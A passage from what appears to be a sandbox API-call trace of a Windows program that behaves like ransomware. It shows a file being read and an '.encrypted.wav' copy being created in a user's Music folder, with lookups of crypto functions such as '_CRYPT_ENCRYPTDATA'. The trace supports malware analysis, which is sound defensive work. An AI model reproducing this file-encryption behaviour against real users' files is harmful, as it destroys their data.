lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.714] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0038.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0038.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0038.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0038.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0038.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0038.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0038.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0038.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0038.715] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0038.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0038.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0038.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0038.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0038.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0038.715] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0038.715] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0038.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0038.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0038.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0038.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0038.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0038.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0038.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0038.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0038.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0038.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0038.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0038.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0038.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0038.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0038.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0038.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0038.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0038.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0038.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0038.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0038.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0038.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0038.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0038.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5758 [0038.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0038.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0038.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0038.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0038.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5758 | out: hHeap=0x770000) returned 1 [0038.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0038.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0038.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0038.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0038.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0038.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0038.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0038.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0038.716] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\y6ubt-qdhh8vkxog3x")) returned 0x10 [0038.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0038.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0038.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0038.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0038.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0038.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0038.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0038.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0038.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0038.717] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.encrypted.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\y6ubt-qdhh8vkxog3x\\6ydesmadulc.encrypted.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0038.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0038.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0038.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0038.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0038.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0038.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0038.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0038.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0038.718] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0038.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0038.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0038.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0038.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0038.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0038.718] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0038.718] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0038.718] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0038.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0038.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0038.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0038.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0038.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0038.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0038.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0038.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0038.719] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0038.719] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x8acf, lpOverlapped=0x0) returned 1 [0038.720] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0038.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0038.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0038.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8acf) returned 0xac0018 [0038.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0038.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0038.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0038.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0038.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0038.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0038.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8acf) returned 0xac8af0 [0038.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0038.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.721] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0038.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0038.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0038.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8acf) returned 0xac0018 [0038.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0038.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0038.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0038.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.722] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0038.722] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0038.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0038.722] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0038.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0038.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0038.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0038.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0038.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0038.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0038.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8acf) returned 0xac0018 [0038.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0038.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0038.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0038.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0038.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2e8 [0038.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0038.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0038.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da348 [0038.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0038.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0038.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0038.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889988 [0038.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0038.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0038.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0038.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0038.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0038.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8acf) returned 0xad15c8 [0038.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0038.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0038.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0038.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0038.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0038.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0038.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0038.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0038.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0038.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0038.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0038.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0038.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0038.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0038.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0038.724] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0038.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0038.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0038.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0038.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0038.724] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0038.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0038.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0038.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0038.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0038.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0038.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0038.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0038.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0038.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0038.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0038.724] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0038.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0038.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0038.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da238 [0038.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0038.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0038.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0038.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0038.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889610 [0038.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0038.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0038.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0038.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0038.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0038.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0038.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0038.725] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0038.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0038.725] RtlAllocateHeap 